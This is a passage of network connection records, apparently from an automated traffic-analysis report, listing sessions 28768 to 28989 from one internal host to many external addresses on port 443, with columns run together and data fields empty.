                                            28768192.168.2.2355156183.175.250.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28769192.168.2.2349420145.222.222.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28770192.168.2.23370342.134.90.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28771192.168.2.233634090.173.69.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28772192.168.2.2337236133.24.19.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28773192.168.2.2353106203.229.94.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28774192.168.2.235449497.133.30.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28775192.168.2.233564246.24.240.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28776192.168.2.2354192145.62.162.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28777192.168.2.2334000189.232.228.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28778192.168.2.233564889.250.25.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28779192.168.2.2346358216.113.20.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28780192.168.2.235334654.134.59.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28781192.168.2.236063058.150.225.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28782192.168.2.234314695.189.79.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28783192.168.2.233674047.196.238.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28784192.168.2.233517023.89.27.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28785192.168.2.235201253.152.228.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28786192.168.2.2359744201.216.189.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28787192.168.2.234392858.126.0.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28788192.168.2.233784041.218.189.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28789192.168.2.235086861.206.187.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28790192.168.2.235798881.126.7.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28791192.168.2.2342324105.161.126.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28792192.168.2.234562067.170.220.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28793192.168.2.234834689.235.170.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28794192.168.2.234418650.154.127.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28795192.168.2.2338092156.4.55.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28796192.168.2.2342154122.120.2.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28797192.168.2.2336802209.72.140.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28798192.168.2.2346700105.227.11.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28799192.168.2.2349862108.21.143.132443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28800192.168.2.2352800221.247.127.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28801192.168.2.233692644.163.171.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28802192.168.2.234111261.90.200.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28803192.168.2.2333996178.83.29.199443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28804192.168.2.235102868.79.194.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28805192.168.2.2334000208.9.146.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28806192.168.2.234355219.24.27.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28807192.168.2.2353228159.251.132.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28808192.168.2.235633041.36.96.186443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28809192.168.2.2335884203.47.18.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28810192.168.2.2347696108.187.131.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28811192.168.2.234911285.22.106.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28812192.168.2.23603984.61.2.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28813192.168.2.2341080186.194.37.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28814192.168.2.23428482.236.210.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28815192.168.2.2358458145.113.130.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28816192.168.2.2333672134.106.99.142443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28817192.168.2.2339828192.61.72.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28818192.168.2.233975012.2.203.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28819192.168.2.235008282.178.89.175443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28820192.168.2.234978660.229.165.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28821192.168.2.236000434.102.235.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28822192.168.2.2355700165.164.95.148443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28823192.168.2.2351392221.161.2.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28824192.168.2.233358434.138.206.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28825192.168.2.2353622147.164.77.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28826192.168.2.2335170192.23.31.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28827192.168.2.2339020198.238.78.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28828192.168.2.235730677.238.97.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28829192.168.2.2347940209.13.40.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28830192.168.2.233832052.68.107.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28831192.168.2.234433878.81.149.12443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28832192.168.2.235100689.216.59.69443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28833192.168.2.2340442105.221.219.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28834192.168.2.2352088141.242.33.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28835192.168.2.2357258110.240.130.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28836192.168.2.2348586111.1.183.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28837192.168.2.2340456201.31.14.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28838192.168.2.2350330112.1.43.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28839192.168.2.234469027.36.115.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28840192.168.2.2344936162.130.60.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28841192.168.2.234693850.152.198.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28842192.168.2.233331689.185.30.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28843192.168.2.2340412210.135.6.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28844192.168.2.234146060.190.213.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28845192.168.2.235308899.131.236.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28846192.168.2.233374680.255.196.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28847192.168.2.233475451.148.245.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28848192.168.2.2351936124.235.137.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28849192.168.2.234933678.162.159.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28850192.168.2.2359882143.147.226.70443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28851192.168.2.234797469.250.141.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28852192.168.2.235199657.222.77.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28853192.168.2.2337996137.120.169.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28854192.168.2.235490419.248.33.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28855192.168.2.2355570168.235.241.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28856192.168.2.2334100149.136.148.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28857192.168.2.2343336182.100.186.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28858192.168.2.2347576191.164.128.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28859192.168.2.2339908174.147.215.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28860192.168.2.2338184108.49.180.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28861192.168.2.2348208171.107.93.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28862192.168.2.234407652.88.221.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28863192.168.2.234495635.230.231.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28864192.168.2.2350636170.120.93.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28865192.168.2.235344236.183.34.150443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28866192.168.2.234995673.78.17.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28867192.168.2.2348230124.19.158.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28868192.168.2.235982250.60.39.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28869192.168.2.2336056182.136.190.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28870192.168.2.235099076.153.133.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28871192.168.2.2337278201.151.195.120443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28872192.168.2.234947852.109.50.166443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28873192.168.2.2345254107.45.54.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28874192.168.2.234202034.109.234.72443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28875192.168.2.233944652.163.18.11443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28876192.168.2.2339568193.8.17.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28877192.168.2.2359158161.1.203.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28878192.168.2.2360476158.21.222.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28879192.168.2.2349004176.78.17.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28880192.168.2.2358776137.177.84.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28881192.168.2.233718867.158.184.177443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28882192.168.2.23567608.225.74.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28883192.168.2.2347094172.187.31.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28884192.168.2.233750438.139.85.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28885192.168.2.235922491.207.15.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28886192.168.2.235587648.213.183.226443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28887192.168.2.2346554112.25.168.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28888192.168.2.233884651.57.21.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28889192.168.2.2348072144.37.236.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28890192.168.2.2335242206.245.116.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28891192.168.2.2341728205.132.65.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28892192.168.2.235629259.111.205.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28893192.168.2.23583165.102.190.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28894192.168.2.2343970151.151.93.19443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28895192.168.2.234846299.62.21.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28896192.168.2.23560605.38.1.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28897192.168.2.2345056146.71.242.176443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28898192.168.2.2337830108.27.173.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28899192.168.2.234139854.165.102.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28900192.168.2.2354210165.184.153.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28901192.168.2.234127679.47.201.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28902192.168.2.233820843.88.210.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28903192.168.2.235044094.59.167.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28904192.168.2.233790269.137.201.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28905192.168.2.2343486152.172.150.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28906192.168.2.2336666129.146.48.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28907192.168.2.235625880.139.86.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28908192.168.2.2336080155.65.235.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28909192.168.2.233507861.159.8.221443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28910192.168.2.235607418.217.171.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28911192.168.2.2355212136.185.143.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28912192.168.2.2339012121.160.94.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28913192.168.2.235456676.16.242.185443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28914192.168.2.2334654219.123.4.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28915192.168.2.235294065.6.103.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28916192.168.2.2344316174.82.220.18443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28917192.168.2.234965050.101.36.106443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28918192.168.2.2338066176.21.160.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28919192.168.2.2353978100.47.77.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28920192.168.2.2345722183.38.52.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28921192.168.2.235936065.15.253.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28922192.168.2.2353462199.217.117.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28923192.168.2.2339204120.195.5.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28924192.168.2.2350948113.147.132.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28925192.168.2.2348780131.0.36.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28926192.168.2.2347888155.223.95.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28927192.168.2.233894062.147.220.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28928192.168.2.2340170104.21.187.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28929192.168.2.2353868222.142.206.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28930192.168.2.234678447.177.236.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28931192.168.2.2350950220.86.132.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28932192.168.2.2340772211.81.49.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28933192.168.2.2347108159.1.222.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28934192.168.2.2342724112.245.77.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28935192.168.2.2354878167.27.71.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28936192.168.2.235832891.34.236.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28937192.168.2.233619680.26.148.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28938192.168.2.2358956160.43.249.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28939192.168.2.2340448185.124.107.44443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28940192.168.2.235004037.140.254.151443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28941192.168.2.233872454.233.104.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28942192.168.2.234841673.222.69.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28943192.168.2.234993220.232.133.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28944192.168.2.2347666149.54.99.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28945192.168.2.2341812125.151.76.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28946192.168.2.2346588179.37.190.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28947192.168.2.2357314100.181.235.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28948192.168.2.233799437.17.97.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28949192.168.2.236053484.94.150.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28950192.168.2.234669212.201.201.40443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28951192.168.2.2354692213.171.94.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28952192.168.2.235818069.122.131.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28953192.168.2.235901265.172.71.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28954192.168.2.23433824.212.246.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28955192.168.2.2335004218.96.221.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28956192.168.2.2352172119.14.222.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28957192.168.2.2360442190.221.220.169443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28958192.168.2.2358948173.239.241.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28959192.168.2.2334108136.182.31.182443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28960192.168.2.2351364107.94.123.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28961192.168.2.2353368205.43.252.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28962192.168.2.2358328206.160.15.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28963192.168.2.2338998180.33.58.100443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28964192.168.2.2336954136.76.83.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28965192.168.2.2355734156.210.182.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28966192.168.2.236001288.39.75.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28967192.168.2.2336628124.102.220.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28968192.168.2.233455839.247.120.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28969192.168.2.2352784137.79.226.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28970192.168.2.235804020.64.88.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28971192.168.2.235596084.179.102.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28972192.168.2.2336264198.50.139.157443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28973192.168.2.235894098.178.10.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28974192.168.2.2349192135.16.67.218443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28975192.168.2.2360400148.92.123.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28976192.168.2.2341104130.246.238.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28977192.168.2.2339932190.90.59.121443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28978192.168.2.2345468194.226.255.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28979192.168.2.2345472114.166.139.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28980192.168.2.233420481.6.81.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28981192.168.2.2347138210.25.37.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28982192.168.2.2337192149.67.212.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28983192.168.2.235502659.225.62.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28984192.168.2.234746218.60.246.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28985192.168.2.235582487.210.253.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28986192.168.2.234725462.73.158.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28987192.168.2.2336886163.48.97.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28988192.168.2.235617432.170.33.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            28989192.168.2.2346680121.55.103.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
